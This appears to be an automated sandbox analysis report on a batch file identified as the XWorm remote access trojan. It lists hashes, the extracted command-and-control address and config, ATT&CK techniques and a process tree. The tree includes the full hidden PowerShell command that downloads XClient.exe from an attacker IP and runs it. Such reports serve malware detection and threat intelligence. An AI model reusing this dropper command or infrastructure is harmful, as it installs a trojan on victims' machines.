xworm | 5de6fc51288473b4d652bc281af2bac6d8a5b3795d12d63fb8b50e08d5294ebb

Resubmissions

24-01-2025 12:21

250124-pjmz3azkaq 6

24-01-2025 12:20

24-01-2025 12:01

24-01-2025 12:00

24-01-2025 11:33

24-01-2025 11:20

Analysis

max time kernel
20s
max time network
21s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-01-2025 11:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RuhsatBelgesi12ACE575 FORDKUNGA.bat
Size

1KB
MD5

be7fa3571d22850513b226ec24eef667
SHA1

4329266e1030c80af32a87387aa08afa1982ca8b
SHA256

83ac2825a5a6f97df1268c60d014182ed4be1c0088de5a8b9527a68556354570
SHA512

34e46f4a7318e1dd24909d139dd1c76b2b31f4ce1bcb4ee4a6c692d0fcbe45cfdb1a487a16d1242a536c44aaf8f3656981a0026d143e71bf951270774a067b0f

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.32.153.7/filezilla/ftp/htp/xd/yk/zp/XClient.exe

Extracted

Family

xworm

Version

5.0

45.32.153.7:7005

127.0.0.1:7005

Mutex

1BGj20FVtOyvp4A2

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002aad3-18.dat	family_xworm
behavioral1/memory/1040-20-0x0000000000450000-0x000000000045E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	1872	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1872	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
1	1872	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1040	XClient.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
1164	NETSTAT.EXE

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2796	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1164	NETSTAT.EXE

Modifies registry class 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1872	powershell.exe
1872	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1040	XClient.exe
Token: SeDebugPrivilege	1164	NETSTAT.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3108 wrote to memory of 1704	3108	cmd.exe	80
PID 3108 wrote to memory of 1704	3108	cmd.exe	80
PID 3108 wrote to memory of 1872	3108	cmd.exe	81
PID 3108 wrote to memory of 1872	3108	cmd.exe	81
PID 3108 wrote to memory of 1040	3108	cmd.exe	82
PID 3108 wrote to memory of 1040	3108	cmd.exe	82
PID 3108 wrote to memory of 2796	3108	cmd.exe	83
PID 3108 wrote to memory of 2796	3108	cmd.exe	83
PID 3108 wrote to memory of 1164	3108	cmd.exe	84
PID 3108 wrote to memory of 1164	3108	cmd.exe	84
PID 3108 wrote to memory of 4720	3108	cmd.exe	85
PID 3108 wrote to memory of 4720	3108	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RuhsatBelgesi12ACE575 FORDKUNGA.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Windows\system32\fsutil.exe
  fsutil dirty query C:
  2⤵
  PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://45.32.153.7/filezilla/ftp/htp/xd/yk/zp/XClient.exe', 'C:\XClient.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\XClient.exe
  "C:\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2796
- C:\Windows\system32\NETSTAT.EXE
  netstat -ano
  2⤵
  - System Network Connections Discovery
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\system32\find.exe
  find "7000"
  2⤵
  PID:4720

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:3576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lszcqb3f.zpu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\XClient.exe

Filesize
32KB

MD5
ba9f3ccb1f48af4e217e69a88c84f39c

SHA1
b8e37cbe88d69a5a69ca5908cd8a26135e1d813a

SHA256
ada132efdfa280b6748e110ce79743d17ee1059c014bf8189ec9be4c3db3d1cd

SHA512
998022d2082e129293ee68f9acc3daf1efa2901c16a72312a01f7e816c69d26f8d8dd3cc7f470977d7bd00aa77133b7be6c62344fca434adf571f6faf8141716

Download Submit
memory/1040-24-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1040-23-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1040-22-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1040-21-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1040-20-0x0000000000450000-0x000000000045E000-memory.dmp

Filesize
56KB

Download
memory/1872-10-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1872-16-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1872-12-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1872-11-0x00007FFBF58D0000-0x00007FFBF6392000-memory.dmp

Filesize
10.8MB

Download
memory/1872-0-0x00007FFBF58D3000-0x00007FFBF58D5000-memory.dmp

Filesize
8KB

Download
memory/1872-9-0x0000025E73FC0000-0x0000025E73FE2000-memory.dmp

Filesize
136KB

Download